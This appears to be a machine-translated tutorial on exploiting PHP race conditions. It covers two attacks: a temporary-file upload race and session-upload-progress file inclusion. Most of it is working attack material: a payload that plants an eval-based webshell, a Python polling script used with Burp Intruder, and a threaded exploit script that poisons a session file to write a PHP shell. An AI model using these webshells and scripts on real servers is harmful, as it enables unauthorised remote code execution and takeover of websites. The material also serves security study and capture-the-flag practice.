Test demo:
<html> <body> <form action="" method="post" enctype="multipart/form-data"> <label for="file">Filename:</label> <input type="file" name="file"/> <input type="submit" name="submit" value="Submit" /> </form> </body> </html> <?php if (!empty($_FILES)) { move_uploaded_file($_FILES['file']['tmp_name'],$_FILES['file']['name']); unlink($_FILES['file']['name']); } ?>
shell file contents:
<?PHP echo md5(1); fputs(fopen('shell6666.php','w'),'<?php @eval($_POST[1])?>'); ?>
Have access to upload files py script:
# coding:utf-8 import requests def main(): i=0 while 1: try: print(i,end='\r') a = requests.get("http://aaa.io/sssss.php") if "c4ca4238a0b923820dcc509a6f75849b" in a.text: print("OK") break except Exception as e: pass i+=1 if __name__ == '__main__': main()
Wherein c4ca4238a0b923820dcc509a6f75849b = md5 (1)
burp Settings: -> Intrudermo sent to Module ->
Then run our py script, and open burp blasting, the order does not matter, you can turn almost next time.
Another session files and compete
demo:
<?php if (isset($_GET['file'])) { include './' . $_GET['file']; }
In this case we can not upload the file, how to use it? That's file contains session.
We know session_start session control function open (), when not using the function how to do it?
The presence of session upload_progress property, used to record file upload progress, and is enabled by default state.
That is, when there PHP_SESSION_UPLOAD_PROGRESS field of our POST data packet, without calling session_start () function can also be initialized session. But the default will be cleared at the end, so we need to take advantage of the conditions of competition.
Proof demo: 1.php
<html> <body> <form action="" method="post" enctype="multipart/form-data"> <label for="file">Filename:</label> <input type="text" name="PHP_SESSION_UPLOAD_PROGRESS" value="888"/> <input type="file" name="file"/> <input type="submit" name="submit" value="Submit" /> </form> </body> </html> <?php ?>
Note: <input type = "text" name = "PHP_SESSION_UPLOAD_PROGRESS" value = "888" /> must be in front of the <input type = "file" name = "file" />, otherwise no way to control the session file name generation.
Exploit script:
import io import requests import threading sessid = 'ph1' def t1(session): while True: f = io.BytesIO(b'a' * 1024 * 50) response = session.post( 'http://localhost/2.php', data={'PHP_SESSION_UPLOAD_PROGRESS': '<?=file_put_contents("shell123.php","<?=phpinfo();?>")?>'}, files={'file': ('a.txt', f)}, cookies={'PHPSESSID': sessid} ) def t2(session): while True: response = session.get(f'http://localhost/2.php?file=../Extensions/tmp/tmp/sess_{sessid}') print(response.text) with requests.session() as session: t1 = threading.Thread(target=t1, args=(session, )) t1.daemon = True t1.start() t2(session)
Modify the corresponding access path, and session file path, you can. Generate shell123.php files after successful.